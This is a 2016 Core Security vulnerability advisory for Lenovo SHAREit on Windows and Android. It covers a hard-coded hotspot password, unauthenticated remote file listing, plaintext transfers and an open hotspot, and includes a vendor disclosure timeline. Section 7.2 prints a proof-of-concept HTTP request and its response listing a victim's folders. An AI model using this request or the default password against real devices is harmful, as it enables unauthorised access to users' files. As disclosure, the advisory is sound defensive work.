Lenovo ShareIT Multiple Vulnerabilities

Lenovo ShareIT Multiple Vulnerabilities

1. Advisory Information

Title: Lenovo ShareIT Multiple Vulnerabilities
Advisory ID: CORE-2016-0002
Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities
Date published: 2016-01-25
Date of last update: 2016-01-22
Vendors contacted: Lenovo
Release mode: Coordinated release

2. Vulnerability Information

Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862]
Impact: Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492

 

3. Vulnerability Description

SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers.

Lenovo SHAREit for Windows and Android are prone to multiple vulnerabilities which could result in integrity corruption, information leak and security bypasses.

4. Vulnerable Packages

  • Lenovo SHAREit for Android 3.0.18_ww
  • Lenovo SHAREit for Windows 2.5.1.1

Other products and versions may also be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

Lenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues.

The new version of the products can be found here [1].

6. Credits

This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.

 

7. Technical Description / Proof of Concept Code

7.1. Hard-coded password in Lenovo SHAREit for Windows

[CVE-2016-1491] When Lenovo SHAREit for Windows is configured to receive files, a Wifi HotSpot is set with an easy password (12345678). Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same.

7.2. Remote browsing of file system on Lenovo SHAREit for Windows

[CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action:

 
POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)
Host: 192.168.173.1:2999
Connection: Keep-Alivek
Accept-Encoding: gzip
Content-Length: 0
HTTP/1.0 200 OK
Content-Length: 2426


{"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links",
"has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My
Music","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My
Pictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Saved
Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved
Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved
Games","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My
","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}
       

7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit

[CVE-2016-1489] The files are transfered via HTTP without encryption. An attacker that is able to sniff the network traffic could to view the data transferred or perform man in the middle attacks, for example by modifying the content of the transferred files.

7.4. Open WiFi Network defined on Android devices

[CVE-2016-1492] When the application is configured to receive files, an open Wifi HotSpot is created without any password. An attacker could connect to that HotSpot and capture the information transferred between those devices.

 

8. Report Timeline

  • 2015-10-29: Core Security sent an initial notification to Lenovo.
  • 2015-10-29: Lenovo replied attaching their public PGP key.
  • 2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version.
  • 2015-10-29: Lenovo replied their development team would review Core Security findings.
  • 2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting.
  • 2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor.
  • 2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable.
  • 2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release.
  • 2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues.
  • 2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix.
  • 2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week.
  • 2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date.
  • 2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password.
  • 2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team.
  • 2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode".
  • 2015-12-06: Lenovo informed Core Security that they were still working on the schedule.
  • 2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release.
  • 2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January.
  • 2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday.
  • 2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend.
  • 2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn't planned a date for their advisory disclosure.
  • 2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version.
  • 2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday 11 deadline.
  • 2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested.
  • 2016-01-06: Core Security sent Lenovo the draft version of the advisory.
  • 2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit.
  • 2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over.
  • 2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February
  • 2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure.
  • 2016-01-08: Lenovo informed Core Security that they agreed to our terms.
  • 2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February.
  • 2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well.
  • 2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22.
  • 2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could.
  • 2016-01-19: Lenovo informed Core Security that they agreed to our request.
  • 2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January.
  • 2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version.
  • 2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well.
  • 2016-01-25: Advisory CORE-2016-0002 published.

9. References

[1] http://shareit.lenovo.com/#DOWNLOAD.
[2] http://www.lenovo.com.

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.